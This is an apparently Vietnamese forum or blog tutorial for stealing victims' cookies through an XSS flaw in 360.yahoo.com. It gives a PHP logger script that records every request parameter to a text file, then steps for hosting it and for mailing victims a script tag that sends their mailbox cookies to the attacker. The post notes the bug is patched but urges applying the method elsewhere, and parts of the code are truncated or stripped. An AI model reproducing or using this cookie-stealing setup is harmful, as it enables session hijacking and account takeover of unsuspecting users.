[Hacking] Lấy cookies của nạn nhân - 360.yahoo.com

Trích dẫn

---> [TUT] Khai thac & hack bug lấy cookies nạn nhân 360.yahoo.com !
---> http://www.vnghiit.com/blog - Người viết TUT babylove117x
---> Yahoo fix lỗi XSS rồi nên hem lấy đc nữa, đọc tham khảo để áp dụng vào cái khác ...

1. Mở notepad lên ... copy đoạn code dưới vào notepad & save lại thành file PHP
Mình sẽ save lại thành docs.php

//Begin of docs.php
");
function getvars($arr, $title)
{
$res = "";
$len = count($arr);
if ($len>0)
{
if (strlen($title)>0)
{
print("[--------$title--------]" . HTML_LINE);
$res .= "[--------$title--------]" . LINE;
}
foreach ($arr as $key => $value)
{
print("[$key]" . HTML_LINE);
print($arr[$key] . HTML_LINE);
$res .= "[$ key]" . LINE . $arr[$key] . LINE;
}
}
return $res;
}
// get current date
$now = date("Y-m-d H : i : s ");
// init
$myData = "[-----$now-----]" . LINE;
// get
$myData .= getvars($HTTP_GET_VARS, "");
// file
$file = "ketqua.txt";
$mode = "r+";
if (!file_exists($file))
$mode = "w+";
$fp = fopen ($file, $mode);
fseek($fp, 0, SEEK_END);
fwrite($fp, $myData);
fclose($fp);
?>
//end of docs.php

2. Sau đó up lên host hỗ trợ PHP
3. Bạn lấy acc của mình login vào 360.yahoo.com vào mailbox và compose messenger

Và gõ đoạn code này vào khung text

<.script>
document.write('')
<./script>

Và send đi ...

Khi victim nhận được mail check mailbox thì nó sẽ tự dộng save cookies vào ketqua.txt cùng thư mục với docs.php

Và lúc đó bạn biết làm gì rồi đó !

RefLink: http://vnitblog.com/blog/TUT--Lay-cookies-cua-nan-nhan---360-yahoo-com/